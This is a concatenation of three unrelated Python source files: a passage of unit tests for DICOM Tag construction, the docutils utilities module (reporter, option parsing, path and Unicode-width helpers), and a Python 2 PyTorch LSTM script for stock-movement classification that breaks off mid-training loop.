# Must be 32-bit
pytest.raises(OverflowError, Tag, [65536, 0])
pytest.raises(OverflowError, Tag, [0, 65536])
pytest.raises(OverflowError, Tag, ('0xFFFF', '0xFFFF1'))
# Must be positive
pytest.raises(ValueError, Tag, [-1, 0])
pytest.raises(ValueError, Tag, [0, -1])
pytest.raises(ValueError, Tag, ('0x0', '-0x1'))
pytest.raises(ValueError, Tag, ('-0x1', '0x0'))
# Can't have second parameter
msg = r"Unable to create an element tag from '\(\[1, 2\], 1\)'"
with pytest.raises(TypeError, match=msg):
Tag([0x01, 0x02], 0x01)
pytest.raises(TypeError, Tag, [0x01, 0x02], '0x01')
pytest.raises(TypeError, Tag, ['0x01', '0x02'], '0x01')
pytest.raises(TypeError, Tag, ['0x01', '0x02'], 0x01)
def test_tag_single_str(self):
"""Test creating a Tag from a single str."""
assert Tag('0x10002000') == BaseTag(0x10002000)
assert Tag('0x2000') == BaseTag(0x00002000)
assert Tag('15') == BaseTag(0x00000015)
assert Tag('0xF') == BaseTag(0x0000000F)
assert Tag("PatientName") == BaseTag(0x00100010)
# Must be 32-bit
pytest.raises(OverflowError, Tag, '0xFFFFFFFF1')
# Must be positive
pytest.raises(ValueError, Tag, '-0x01')
# Must be numeric str or DICOM keyword
pytest.raises(ValueError, Tag, 'hello')
def test_tag_double_str(self):
"""Test creating a Tag from two str."""
assert Tag('0x1000', '0x2000') == BaseTag(0x10002000)
assert Tag('0x10', '0x20') == BaseTag(0x00100020)
assert Tag('15', '0') == BaseTag(0x00150000)
assert Tag('0xF', '0') == BaseTag(0x000F0000)
# Must be 32-bit
pytest.raises(OverflowError, Tag, '0xFFFF1', '0')
pytest.raises(OverflowError, Tag, '0', '0xFFFF1')
# Must be positive
pytest.raises(ValueError, Tag, '-0x01', '0')
pytest.raises(ValueError, Tag, '0', '-0x01')
pytest.raises(ValueError, Tag, '-1', '-0x01')
# Must both be str
pytest.raises(TypeError, Tag, '0x01', 0)
pytest.raises(TypeError, Tag, 0, '0x01')
def test_tag_double_int(self):
"""Test creating a Tag from a two ints."""
assert Tag(0x0000, 0x0000) == BaseTag(0x00000000)
assert Tag(2, 0) == BaseTag(0x00020000)
assert Tag(2, 0).elem == 0x0000
assert Tag(0x99, 0xFE) == BaseTag(0x009900FE)
assert Tag(15, 14) == BaseTag(0x000F000E)
assert Tag(0x1000, 0x2000) == BaseTag(0x10002000)
# Must be 32-bit
pytest.raises(OverflowError, Tag, 65536, 0)
pytest.raises(OverflowError, Tag, 0, 65536)
# Must be positive
pytest.raises(ValueError, Tag, -1, 0)
pytest.raises(ValueError, Tag, 0, -1)
pytest.raises(ValueError, Tag, -65535, -1)
class TestTupleTag:
"""Test the TupleTag method."""
def test_tuple_tag(self):
"""Test quick tag construction with TupleTag."""
assert TupleTag((0xFFFF, 0xFFee)) == BaseTag(0xFFFFFFEE)
class TestTagInException:
"""Test the tag_in_exception method."""
def test_raise_exception(self):
""""""
def test():
tag = Tag(0x00100010)
with tag_in_exception(tag) as tag:
raise ValueError('Test message.')
pytest.raises(ValueError, test)
|
# coding: utf-8
# $Id: __init__.py 8295 2019-07-24 09:22:01Z grubert $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
Miscellaneous utilities for the documentation utilities.
"""
__docformat__ = 'reStructuredText'
import sys
import os
import os.path
import re
import itertools
import warnings
import unicodedata
from docutils import ApplicationError, DataError, __version_info__
from docutils import nodes
from docutils.nodes import unescape
import docutils.io
from docutils.utils.error_reporting import ErrorOutput, SafeString
class SystemMessage(ApplicationError):
def __init__(self, system_message, level):
Exception.__init__(self, system_message.astext())
self.level = level
class SystemMessagePropagation(ApplicationError): pass
class Reporter:
"""
Info/warning/error reporter and ``system_message`` element generator.
Five levels of system messages are defined, along with corresponding
methods: `debug()`, `info()`, `warning()`, `error()`, and `severe()`.
There is typically one Reporter object per process. A Reporter object is
instantiated with thresholds for reporting (generating warnings) and
halting processing (raising exceptions), a switch to turn debug output on
or off, and an I/O stream for warnings. These are stored as instance
attributes.
When a system message is generated, its level is compared to the stored
thresholds, and a warning or error is generated as appropriate. Debug
messages are produced if the stored debug switch is on, independently of
other thresholds. Message output is sent to the stored warning stream if
not set to ''.
The Reporter class also employs a modified form of the "Observer" pattern
[GoF95]_ to track system messages generated. The `attach_observer` method
should be called before parsing, with a bound method or function which
accepts system messages. The observer can be removed with
`detach_observer`, and another added in its place.
.. [GoF95] Gamma, Helm, Johnson, Vlissides. *Design Patterns: Elements of
Reusable Object-Oriented Software*. Addison-Wesley, Reading, MA, USA,
1995.
"""
levels = 'DEBUG INFO WARNING ERROR SEVERE'.split()
"""List of names for system message levels, indexed by level."""
# system message level constants:
(DEBUG_LEVEL,
INFO_LEVEL,
WARNING_LEVEL,
ERROR_LEVEL,
SEVERE_LEVEL) = range(5)
def __init__(self, source, report_level, halt_level, stream=None,
debug=False, encoding=None, error_handler='backslashreplace'):
"""
:Parameters:
- `source`: The path to or description of the source data.
- `report_level`: The level at or above which warning output will
be sent to `stream`.
- `halt_level`: The level at or above which `SystemMessage`
exceptions will be raised, halting execution.
- `debug`: Show debug (level=0) system messages?
- `stream`: Where warning output is sent. Can be file-like (has a
``.write`` method), a string (file name, opened for writing),
'' (empty string) or `False` (for discarding all stream messages)
or `None` (implies `sys.stderr`; default).
- `encoding`: The output encoding.
- `error_handler`: The error handler for stderr output encoding.
"""
self.source = source
"""The path to or description of the source data."""
self.error_handler = error_handler
"""The character encoding error handler."""
self.debug_flag = debug
"""Show debug (level=0) system messages?"""
self.report_level = report_level
"""The level at or above which warning output will be sent
to `self.stream`."""
self.halt_level = halt_level
"""The level at or above which `SystemMessage` exceptions
will be raised, halting execution."""
if not isinstance(stream, ErrorOutput):
stream = ErrorOutput(stream, encoding, error_handler)
self.stream = stream
"""Where warning output is sent."""
self.encoding = encoding or getattr(stream, 'encoding', 'ascii')
"""The output character encoding."""
self.observers = []
"""List of bound methods or functions to call with each system_message
created."""
self.max_level = -1
"""The highest level system message generated so far."""
def set_conditions(self, category, report_level, halt_level,
stream=None, debug=False):
warnings.warn('docutils.utils.Reporter.set_conditions deprecated; '
'set attributes via configuration settings or directly',
DeprecationWarning, stacklevel=2)
self.report_level = report_level
self.halt_level = halt_level
if not isinstance(stream, ErrorOutput):
stream = ErrorOutput(stream, self.encoding, self.error_handler)
self.stream = stream
self.debug_flag = debug
def attach_observer(self, observer):
"""
The `observer` parameter is a function or bound method which takes one
argument, a `nodes.system_message` instance.
"""
self.observers.append(observer)
def detach_observer(self, observer):
self.observers.remove(observer)
def notify_observers(self, message):
for observer in self.observers:
observer(message)
def system_message(self, level, message, *children, **kwargs):
"""
Return a system_message object.
Raise an exception or generate a warning if appropriate.
"""
# `message` can be a `string`, `unicode`, or `Exception` instance.
if isinstance(message, Exception):
message = SafeString(message)
attributes = kwargs.copy()
if 'base_node' in kwargs:
source, line = get_source_line(kwargs['base_node'])
del attributes['base_node']
if source is not None:
attributes.setdefault('source', source)
if line is not None:
attributes.setdefault('line', line)
# assert source is not None, "node has line- but no source-argument"
if 'source' not in attributes: # 'line' is absolute line number
try: # look up (source, line-in-source)
source, line = self.get_source_and_line(attributes.get('line'))
# print "locator lookup", kwargs.get('line'), "->", source, line
except AttributeError:
source, line = None, None
if source is not None:
attributes['source'] = source
if line is not None:
attributes['line'] = line
# assert attributes['line'] is not None, (message, kwargs)
# assert attributes['source'] is not None, (message, kwargs)
attributes.setdefault('source', self.source)
msg = nodes.system_message(message, level=level,
type=self.levels[level],
*children, **attributes)
if self.stream and (level >= self.report_level
or self.debug_flag and level == self.DEBUG_LEVEL
or level >= self.halt_level):
self.stream.write(msg.astext() + '\n')
if level >= self.halt_level:
raise SystemMessage(msg, level)
if level > self.DEBUG_LEVEL or self.debug_flag:
self.notify_observers(msg)
self.max_level = max(level, self.max_level)
return msg
def debug(self, *args, **kwargs):
"""
Level-0, "DEBUG": an internal reporting issue. Typically, there is no
effect on the processing. Level-0 system messages are handled
separately from the others.
"""
if self.debug_flag:
return self.system_message(self.DEBUG_LEVEL, *args, **kwargs)
def info(self, *args, **kwargs):
"""
Level-1, "INFO": a minor issue that can be ignored. Typically there is
no effect on processing, and level-1 system messages are not reported.
"""
return self.system_message(self.INFO_LEVEL, *args, **kwargs)
def warning(self, *args, **kwargs):
"""
Level-2, "WARNING": an issue that should be addressed. If ignored,
there may be unpredictable problems with the output.
"""
return self.system_message(self.WARNING_LEVEL, *args, **kwargs)
def error(self, *args, **kwargs):
"""
Level-3, "ERROR": an error that should be addressed. If ignored, the
output will contain errors.
"""
return self.system_message(self.ERROR_LEVEL, *args, **kwargs)
def severe(self, *args, **kwargs):
"""
Level-4, "SEVERE": a severe error that must be addressed. If ignored,
the output will contain severe errors. Typically level-4 system
messages are turned into exceptions which halt processing.
"""
return self.system_message(self.SEVERE_LEVEL, *args, **kwargs)
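# Usage sketch (added for illustration, not part of the original module): a
# standalone Reporter that writes warnings and above to stderr and raises
# `SystemMessage` once the halt level is reached (assuming SEVERE_LEVEL equals
# the halt_level of 4 used here):
#
#     reporter = Reporter('<string>', 2, 4)
#     reporter.warning('written to the warning stream')
#     reporter.severe('should raise SystemMessage and halt processing')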
class ExtensionOptionError(DataError): pass
class BadOptionError(ExtensionOptionError): pass
class BadOptionDataError(ExtensionOptionError): pass
class DuplicateOptionError(ExtensionOptionError): pass
def extract_extension_options(field_list, options_spec):
"""
Return a dictionary mapping extension option names to converted values.
:Parameters:
- `field_list`: A flat field list without field arguments, where each
field body consists of a single paragraph only.
- `options_spec`: Dictionary mapping known option names to a
conversion function such as `int` or `float`.
:Exceptions:
- `KeyError` for unknown option names.
- `ValueError` for invalid option values (raised by the conversion
function).
- `TypeError` for invalid option value types (raised by conversion
function).
- `DuplicateOptionError` for duplicate options.
- `BadOptionError` for invalid fields.
- `BadOptionDataError` for invalid option data (missing name,
missing data, bad quotes, etc.).
"""
option_list = extract_options(field_list)
option_dict = assemble_option_dict(option_list, options_spec)
return option_dict
def extract_options(field_list):
"""
Return a list of option (name, value) pairs from field names & bodies.
:Parameter:
`field_list`: A flat field list, where each field name is a single
word and each field body consists of a single paragraph only.
:Exceptions:
- `BadOptionError` for invalid fields.
- `BadOptionDataError` for invalid option data (missing name,
missing data, bad quotes, etc.).
"""
option_list = []
for field in field_list:
if len(field[0].astext().split()) != 1:
raise BadOptionError(
'extension option field name may not contain multiple words')
name = str(field[0].astext().lower())
body = field[1]
if len(body) == 0:
data = None
elif len(body) > 1 or not isinstance(body[0], nodes.paragraph) \
or len(body[0]) != 1 or not isinstance(body[0][0], nodes.Text):
raise BadOptionDataError(
'extension option field body may contain\n'
'a single paragraph only (option "%s")' % name)
else:
data = body[0][0].astext()
option_list.append((name, data))
return option_list
def assemble_option_dict(option_list, options_spec):
"""
Return a mapping of option names to values.
:Parameters:
- `option_list`: A list of (name, value) pairs (the output of
`extract_options()`).
- `options_spec`: Dictionary mapping known option names to a
conversion function such as `int` or `float`.
:Exceptions:
- `KeyError` for unknown option names.
- `DuplicateOptionError` for duplicate options.
- `ValueError` for invalid option values (raised by conversion
function).
- `TypeError` for invalid option value types (raised by conversion
function).
"""
options = {}
for name, value in option_list:
convertor = options_spec[name] # raises KeyError if unknown
if convertor is None:
raise KeyError(name) # or if explicitly disabled
if name in options:
raise DuplicateOptionError('duplicate option "%s"' % name)
try:
options[name] = convertor(value)
        except (ValueError, TypeError) as detail:
raise detail.__class__('(option: "%s"; value: %r)\n%s'
% (name, value, ' '.join(detail.args)))
return options
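# Usage sketch (added for illustration): each value is passed through the
# conversion function registered for its name in `options_spec`.
#
#     assemble_option_dict([('width', '3'), ('scale', '0.5')],
#                          {'width': int, 'scale': float})
#     # -> {'width': 3, 'scale': 0.5}
#
# Unknown names raise KeyError; repeated names raise DuplicateOptionError.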
class NameValueError(DataError): pass
def decode_path(path):
"""
Ensure `path` is Unicode. Return `nodes.reprunicode` object.
    Decode file/path string in a failsafe manner if not already done.
"""
# see also http://article.gmane.org/gmane.text.docutils.user/2905
if isinstance(path, unicode):
return path
try:
path = path.decode(sys.getfilesystemencoding(), 'strict')
except AttributeError: # default value None has no decode method
return nodes.reprunicode(path)
except UnicodeDecodeError:
try:
path = path.decode('utf-8', 'strict')
except UnicodeDecodeError:
path = path.decode('ascii', 'replace')
return nodes.reprunicode(path)
def extract_name_value(line):
"""
Return a list of (name, value) from a line of the form "name=value ...".
:Exception:
`NameValueError` for invalid input (missing name, missing data, bad
quotes, etc.).
"""
attlist = []
while line:
equals = line.find('=')
if equals == -1:
raise NameValueError('missing "="')
attname = line[:equals].strip()
if equals == 0 or not attname:
raise NameValueError(
'missing attribute name before "="')
line = line[equals+1:].lstrip()
if not line:
raise NameValueError(
'missing value after "%s="' % attname)
if line[0] in '\'"':
endquote = line.find(line[0], 1)
if endquote == -1:
raise NameValueError(
'attribute "%s" missing end quote (%s)'
% (attname, line[0]))
if len(line) > endquote + 1 and line[endquote + 1].strip():
raise NameValueError(
'attribute "%s" end quote (%s) not followed by '
'whitespace' % (attname, line[0]))
data = line[1:endquote]
line = line[endquote+1:].lstrip()
else:
space = line.find(' ')
if space == -1:
data = line
line = ''
else:
data = line[:space]
line = line[space+1:].lstrip()
attlist.append((attname.lower(), data))
return attlist
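# Usage sketch (added for illustration): quoted values may contain spaces,
# unquoted values end at the next space.
#
#     extract_name_value('width="10 em" scale=50')
#     # -> [('width', '10 em'), ('scale', '50')]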
def new_reporter(source_path, settings):
"""
Return a new Reporter object.
:Parameters:
`source` : string
The path to or description of the source text of the document.
`settings` : optparse.Values object
Runtime settings.
"""
reporter = Reporter(
source_path, settings.report_level, settings.halt_level,
stream=settings.warning_stream, debug=settings.debug,
encoding=settings.error_encoding,
error_handler=settings.error_encoding_error_handler)
return reporter
def new_document(source_path, settings=None):
"""
Return a new empty document object.
:Parameters:
`source_path` : string
The path to or description of the source text of the document.
`settings` : optparse.Values object
Runtime settings. If none are provided, a default core set will
be used. If you will use the document object with any Docutils
components, you must provide their default settings as well. For
example, if parsing, at least provide the parser settings,
obtainable as follows::
settings = docutils.frontend.OptionParser(
components=(docutils.parsers.rst.Parser,)
).get_default_values()
"""
from docutils import frontend
if settings is None:
settings = frontend.OptionParser().get_default_values()
source_path = decode_path(source_path)
reporter = new_reporter(source_path, settings)
document = nodes.document(settings, reporter, source=source_path)
document.note_source(source_path, -1)
return document
def clean_rcs_keywords(paragraph, keyword_substitutions):
if len(paragraph) == 1 and isinstance(paragraph[0], nodes.Text):
textnode = paragraph[0]
for pattern, substitution in keyword_substitutions:
match = pattern.search(textnode)
if match:
paragraph[0] = nodes.Text(pattern.sub(substitution, textnode))
return
def relative_path(source, target):
"""
Build and return a path to `target`, relative to `source` (both files).
If there is no common prefix, return the absolute path to `target`.
"""
source_parts = os.path.abspath(source or type(target)('dummy_file')
).split(os.sep)
target_parts = os.path.abspath(target).split(os.sep)
# Check first 2 parts because '/dir'.split('/') == ['', 'dir']:
if source_parts[:2] != target_parts[:2]:
# Nothing in common between paths.
# Return absolute path, using '/' for URLs:
return '/'.join(target_parts)
source_parts.reverse()
target_parts.reverse()
while (source_parts and target_parts
and source_parts[-1] == target_parts[-1]):
# Remove path components in common:
source_parts.pop()
target_parts.pop()
target_parts.reverse()
parts = ['..'] * (len(source_parts) - 1) + target_parts
return '/'.join(parts)
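# Usage sketch (added for illustration): both arguments are file paths, and
# the result always uses '/' separators (suitable for URLs).
#
#     relative_path('docs/index.txt', 'docs/images/logo.png')
#     # -> 'images/logo.png'
#     relative_path('docs/index.txt', 'README.txt')
#     # -> '../README.txt'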
def get_stylesheet_reference(settings, relative_to=None):
"""
Retrieve a stylesheet reference from the settings object.
Deprecated. Use get_stylesheet_list() instead to
enable specification of multiple stylesheets as a comma-separated
list.
"""
if settings.stylesheet_path:
assert not settings.stylesheet, (
'stylesheet and stylesheet_path are mutually exclusive.')
if relative_to == None:
relative_to = settings._destination
return relative_path(relative_to, settings.stylesheet_path)
else:
return settings.stylesheet
# Return 'stylesheet' or 'stylesheet_path' arguments as list.
#
# The original settings arguments are kept unchanged: you can test
# with e.g. ``if settings.stylesheet_path:``
#
# Differences to ``get_stylesheet_reference``:
# * return value is a list
# * no re-writing of the path (and therefore no optional argument)
# (if required, use ``utils.relative_path(source, target)``
# in the calling script)
def get_stylesheet_list(settings):
"""
Retrieve list of stylesheet references from the settings object.
"""
assert not (settings.stylesheet and settings.stylesheet_path), (
'stylesheet and stylesheet_path are mutually exclusive.')
stylesheets = settings.stylesheet_path or settings.stylesheet or []
# programmatically set default can be string or unicode:
if not isinstance(stylesheets, list):
stylesheets = [path.strip() for path in stylesheets.split(',')]
# expand relative paths if found in stylesheet-dirs:
return [find_file_in_dirs(path, settings.stylesheet_dirs)
for path in stylesheets]
def find_file_in_dirs(path, dirs):
"""
Search for `path` in the list of directories `dirs`.
Return the first expansion that matches an existing file.
"""
if os.path.isabs(path):
return path
for d in dirs:
if d == '.':
f = path
else:
d = os.path.expanduser(d)
f = os.path.join(d, path)
if os.path.exists(f):
return f
return path
def get_trim_footnote_ref_space(settings):
"""
Return whether or not to trim footnote space.
If trim_footnote_reference_space is not None, return it.
If trim_footnote_reference_space is None, return False unless the
footnote reference style is 'superscript'.
"""
if settings.trim_footnote_reference_space is None:
return hasattr(settings, 'footnote_references') and \
settings.footnote_references == 'superscript'
else:
return settings.trim_footnote_reference_space
def get_source_line(node):
"""
Return the "source" and "line" attributes from the `node` given or from
its closest ancestor.
"""
while node:
if node.source or node.line:
return node.source, node.line
node = node.parent
return None, None
def escape2null(text):
"""Return a string with escape-backslashes converted to nulls."""
parts = []
start = 0
while True:
found = text.find('\\', start)
if found == -1:
parts.append(text[start:])
return ''.join(parts)
parts.append(text[start:found])
parts.append('\x00' + text[found+1:found+2])
start = found + 2 # skip character after escape
# `unescape` definition moved to `nodes` to avoid circular import dependency.
def split_escaped_whitespace(text):
"""
Split `text` on escaped whitespace (null+space or null+newline).
Return a list of strings.
"""
strings = text.split('\x00 ')
strings = [string.split('\x00\n') for string in strings]
# flatten list of lists of strings to list of strings:
return list(itertools.chain(*strings))
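# Usage sketch (added for illustration): only backslash-escaped whitespace is
# split on, so run the text through escape2null() first.
#
#     split_escaped_whitespace(escape2null('one\\ two three'))
#     # -> ['one', 'two three']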
def strip_combining_chars(text):
if isinstance(text, str) and sys.version_info < (3,0):
return text
return u''.join([c for c in text if not unicodedata.combining(c)])
def find_combining_chars(text):
"""Return indices of all combining chars in Unicode string `text`.
>>> from docutils.utils import find_combining_chars
>>> find_combining_chars(u'A t̆ab̆lĕ')
[3, 6, 9]
"""
if isinstance(text, str) and sys.version_info < (3,0):
return []
return [i for i,c in enumerate(text) if unicodedata.combining(c)]
def column_indices(text):
"""Indices of Unicode string `text` when skipping combining characters.
>>> from docutils.utils import column_indices
>>> column_indices(u'A t̆ab̆lĕ')
[0, 1, 2, 4, 5, 7, 8]
"""
# TODO: account for asian wide chars here instead of using dummy
# replacements in the tableparser?
    # use a list so that individual indices can be replaced below:
    string_indices = list(range(len(text)))
for index in find_combining_chars(text):
string_indices[index] = None
return [i for i in string_indices if i is not None]
east_asian_widths = {'W': 2, # Wide
'F': 2, # Full-width (wide)
'Na': 1, # Narrow
'H': 1, # Half-width (narrow)
'N': 1, # Neutral (not East Asian, treated as narrow)
'A': 1} # Ambiguous (s/b wide in East Asian context,
# narrow otherwise, but that doesn't work)
"""Mapping of result codes from `unicodedata.east_asian_widt()` to character
column widths."""
def column_width(text):
"""Return the column width of text.
Correct ``len(text)`` for wide East Asian and combining Unicode chars.
"""
if isinstance(text, str) and sys.version_info < (3,0):
return len(text)
width = sum([east_asian_widths[unicodedata.east_asian_width(c)]
for c in text])
# correction for combining chars:
width -= len(find_combining_chars(text))
return width
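# Usage sketch (added for illustration): wide East Asian characters count as
# two columns, combining characters as zero.
#
#     column_width(u'A table')   # -> 7
#     column_width(u'日本')       # -> 4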
def uniq(L):
r = []
for item in L:
if not item in r:
r.append(item)
return r
def unique_combinations(items, n):
"""Return `itertools.combinations`."""
warnings.warn('docutils.utils.unique_combinations is deprecated; '
'use itertools.combinations directly.',
DeprecationWarning, stacklevel=2)
return itertools.combinations(items, n)
def normalize_language_tag(tag):
"""Return a list of normalized combinations for a `BCP 47` language tag.
Example:
>>> from docutils.utils import normalize_language_tag
>>> normalize_language_tag('de_AT-1901')
['de-at-1901', 'de-at', 'de-1901', 'de']
>>> normalize_language_tag('de-CH-x_altquot')
['de-ch-x-altquot', 'de-ch', 'de-x-altquot', 'de']
"""
# normalize:
tag = tag.lower().replace('-','_')
# split (except singletons, which mark the following tag as non-standard):
tag = re.sub(r'_([a-zA-Z0-9])_', r'_\1-', tag)
subtags = [subtag for subtag in tag.split('_')]
base_tag = (subtags.pop(0),)
# find all combinations of subtags
taglist = []
for n in range(len(subtags), 0, -1):
# for tags in unique_combinations(subtags, n):
for tags in itertools.combinations(subtags, n):
taglist.append('-'.join(base_tag+tags))
taglist += base_tag
return taglist
class DependencyList(object):
"""
List of dependencies, with file recording support.
Note that the output file is not automatically closed. You have
to explicitly call the close() method.
"""
def __init__(self, output_file=None, dependencies=[]):
"""
Initialize the dependency list, automatically setting the
output file to `output_file` (see `set_output()`) and adding
all supplied dependencies.
"""
self.set_output(output_file)
for i in dependencies:
self.add(i)
def set_output(self, output_file):
"""
Set the output file and clear the list of already added
dependencies.
`output_file` must be a string. The specified file is
immediately overwritten.
If output_file is '-', the output will be written to stdout.
If it is None, no file output is done when calling add().
"""
self.list = []
if output_file:
if output_file == '-':
of = None
else:
of = output_file
self.file = docutils.io.FileOutput(destination_path=of,
encoding='utf8', autoclose=False)
else:
self.file = None
def add(self, *filenames):
"""
If the dependency `filename` has not already been added,
append it to self.list and print it to self.file if self.file
is not None.
"""
for filename in filenames:
if not filename in self.list:
self.list.append(filename)
if self.file is not None:
self.file.write(filename+'\n')
def close(self):
"""
Close the output file.
"""
self.file.close()
self.file = None
def __repr__(self):
try:
output_file = self.file.name
except AttributeError:
output_file = None
return '%s(%r, %s)' % (self.__class__.__name__, output_file, self.list)
release_level_abbreviations = {
'alpha': 'a',
'beta': 'b',
'candidate': 'rc',
'final': '',}
def version_identifier(version_info=None):
"""
Return a version identifier string built from `version_info`, a
`docutils.VersionInfo` namedtuple instance or compatible tuple. If
`version_info` is not provided, by default return a version identifier
string based on `docutils.__version_info__` (i.e. the current Docutils
version).
"""
if version_info is None:
version_info = __version_info__
if version_info.micro:
micro = '.%s' % version_info.micro
else:
# 0 is omitted:
micro = ''
releaselevel = release_level_abbreviations[version_info.releaselevel]
if version_info.serial:
serial = version_info.serial
else:
# 0 is omitted:
serial = ''
if version_info.release:
dev = ''
else:
dev = '.dev'
version = '%s.%s%s%s%s%s' % (
version_info.major,
version_info.minor,
micro,
releaselevel,
serial,
dev)
return version
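# Usage sketch (added for illustration; assumes the field order of
# docutils.VersionInfo: major, minor, micro, releaselevel, serial, release):
#
#     version_identifier(docutils.VersionInfo(0, 16, 0, 'candidate', 1, False))
#     # -> '0.16rc1.dev'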
|
import argparse
import time
import math
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
from torch.autograd import Variable
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
parser = argparse.ArgumentParser(description='PyTorch Stock Value Prediction Model')
parser.add_argument('--data', type=str, default='./data/sz002821_2',
help='location of the data')
parser.add_argument('--nfeatures', type=int, default=30,
help='dimension of features')
parser.add_argument('--nhid', type=int, default=50,
help='number of hidden units per layer')
parser.add_argument('--nlayers', type=int, default=3,
help='number of layers')
parser.add_argument('--lr', type=float, default=0.001,
help='initial learning rate')
parser.add_argument('--clip', type=float, default=5,
help='gradient clipping')
parser.add_argument('--lr_decay', type=float, default=0.5,
help='decay lr by the rate')
parser.add_argument('--epochs', type=int, default=50,
help='upper epoch limit')
parser.add_argument('--batch_size', type=int, default=20, metavar='N',
help='batch size')
parser.add_argument('--bptt', type=int, default=35,
help='sequence length')
parser.add_argument('--dropout', type=float, default=0.0,
help='dropout applied to layers (0 = no dropout)')
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--cuda', action='store_true',
help='use CUDA')
parser.add_argument('--log-interval', type=int, default=200, metavar='N',
help='report interval')
parser.add_argument('--use_define', action='store_true')
parser.add_argument('--save', type=str, default='./models/rnn.pt',
help='path to save the final model')
args = parser.parse_args()
print '{:=^30}'.format('all args')
for arg in vars(args):
print ' '.join(map(str, (arg, getattr(args, arg))))
class DataIter(object):
def __init__(self, path, batch_size, seq_len, scaler, cuda=False):
self.path = path
self.batch_size = batch_size
self.seq_len = seq_len
self.cuda = cuda
self.scaler = scaler
self.build_data()
self.batchify()
def build_data(self):
#data_type = np.dtype([('features1', 'f8', (19, )), ('features2', 'f8', (11, )),('labels1', 'i8', (1, )), ('labels2', 'i8', (1, ))])
data_type = np.dtype([('features1', 'f8', (30, )), ('labels1', 'i8', (1, )), ('labels2', 'i8', (1, ))])
data = np.loadtxt(self.path, data_type, delimiter=' ')
features1 = data['features1']
#features2 = data['features2']
labels1 = data['labels1']
labels2 = data['labels2']
#features1 = 0.2 * (features1 - 130)
#np.concatenate((features1, features2, features1 * features2), axis=1)
if self.scaler == None:
self.scaler = StandardScaler().fit(features1)
features1 = self.scaler.transform(features1)
features = features1
#features = np.concatenate((features1, features2), axis=1)
count0 = 0
count1 = 0
count2 = 0
for i in range(labels1.shape[0]):
if labels1[i] + labels2[i] > 0:
labels1[i] = 2
count2 += 1
elif labels1[i] + labels2[i] == 0:
labels1[i] = 1
count1 += 1
else:
labels1[i] = 0
count0 += 1
count = float(count0+count1+count2)
print "Class 0: %.4f%%, Class 1: %.4f%%, Class 2: %.4f%%"%(count0/count*100, count1/count*100, count2/count*100)
#labels1[i] = labels1[i] *201 + labels2[i]
#for i in range(labels1.shape[0]):
#labels1[i] += 100
#for i in range(labels2.shape[0]):
#labels2[i] += 100
#for i in range(labels1.shape[0]):
#labels1[i] = labels1[i] *201 + labels2[i]
features = torch.Tensor(features)
labels1 = torch.LongTensor(labels1)
labels2 = torch.LongTensor(labels2)
self.data = features
self.label = labels1
return
def batchify(self):
# Work out how cleanly we can divide the dataset into bsz parts.
nbatch = self.data.size(0) // self.batch_size
# Trim off any extra elements that wouldn't cleanly fit (remainders).
data = self.data[:nbatch * self.batch_size]
label = self.label.t().contiguous()
label = label[:, :nbatch * self.batch_size]
# Evenly divide the data across the bsz batches.
data = data.view(-1, self.batch_size, args.nfeatures).contiguous()
label = label.view(-1, self.batch_size).contiguous()
self.data = data.cuda() if self.cuda else data
self.label = label.cuda() if self.cuda else label
def __iter__(self):
for idx in range(0, self.data.size(0) - 1, self.seq_len):
seq_len = min(self.seq_len, len(self.data) - 1 - idx)
data = Variable(self.data[idx:idx+seq_len])
target = Variable(self.label[idx:idx+seq_len].view(-1))
yield data, target
def __len__(self):
return self.data.size(0) // self.seq_len
class RNNModel(nn.Module):
def __init__(self, nfed, nhid, noutputs, nlayers=1, dropout=0.5):
super(RNNModel, self).__init__()
self.nlayers = nlayers
self.nhid = nhid
self.drop = nn.Dropout(dropout)
self.rnn = nn.LSTM(nfed, nhid, nlayers, dropout=dropout)
self.decoder = nn.Linear(nhid, noutputs)
self.init_weights()
self.rnn_type = "LSTM"
def init_weights(self):
initrange = 0.1
self.decoder.bias.data.fill_(0)
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, input, hidden):
emb = self.drop(input)
output, hidden = self.rnn(emb, hidden)
output = self.drop(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
return decoded.view(output.size(0), output.size(1), decoded.size(1)), hidden
def init_hidden(self, bsz):
weight = next(self.parameters()).data
if self.rnn_type == 'LSTM':
return (Variable(weight.new(self.nlayers, bsz, self.nhid).zero_()),
Variable(weight.new(self.nlayers, bsz, self.nhid).zero_()))
else:
return Variable(weight.new(self.nlayers, bsz, self.nhid).zero_())
def count(pred, label, num, results, labels):
count = 0
pred = pred.cpu()
label = label.cpu()
for i in range(num):
results.append(pred.data[i][0])
labels.append(label.data[i])
def repackage_hidden(h):
"""Wraps hidden states in new Variables, to detach them from their history."""
if type(h) == Variable:
return Variable(h.data)
else:
return tuple(repackage_hidden(v) for v in h)
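# Note (added for illustration): on PyTorch >= 0.4 the same effect can be had
# with .detach(), e.g. for an LSTM hidden-state tuple:
#
#     hidden = tuple(h.detach() for h in hidden)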
class Trainer(object):
def __init__(self, model,
train_iter, valid_iter, test_iter=None,
max_epochs=50):
self.model = model
self.optimizer = optim.Adam(self.model.parameters(), lr = args.lr)
self.criterion = nn.CrossEntropyLoss()
self.train_iter = train_iter
self.valid_iter = valid_iter
self.test_iter = test_iter
self.max_epochs = max_epochs
self.noutput = self.model.decoder.weight.size(0)
self.results = []
self.labels = []
def score(self):
acc = accuracy_score(self.labels, self.results)
print "total acc: %.4f%%"%(acc * 100)
for i in range(3):
pre = precision_score(self.labels, self.results, labels=[i], average='micro')
rec = recall_score(self.labels, self.results, labels=[i], average='micro')
f1 = f1_score(self.labels, self.results, labels=[i], average='micro')
print "for class %d:"%(i)
print "precision: %.4f, recall: %.4f, f1: %.4f "%(pre, rec, f1)
print ""
return acc
def clear_results(self):
self.results = []
self.labels = []
return
def __forward(self, data, hidden, target):
output, hidden = self.model(data, hidden)
loss = self.criterion(output.view(-1, self.noutput), target)
return output, hidden, loss
def __train(self, lr, epoch):
self.model.train()
#self.clear_results()
total_loss = 0
start_time = time.time()
hidden = self.model.init_hidden(self.train_iter.batch_size)
for batch, (d, targets) in enumerate(self.train_iter):
self.model.zero_grad()
hidden = repackage_hidden(hidden)
output, hidden, loss = self.__forward(d, hidden, targets)
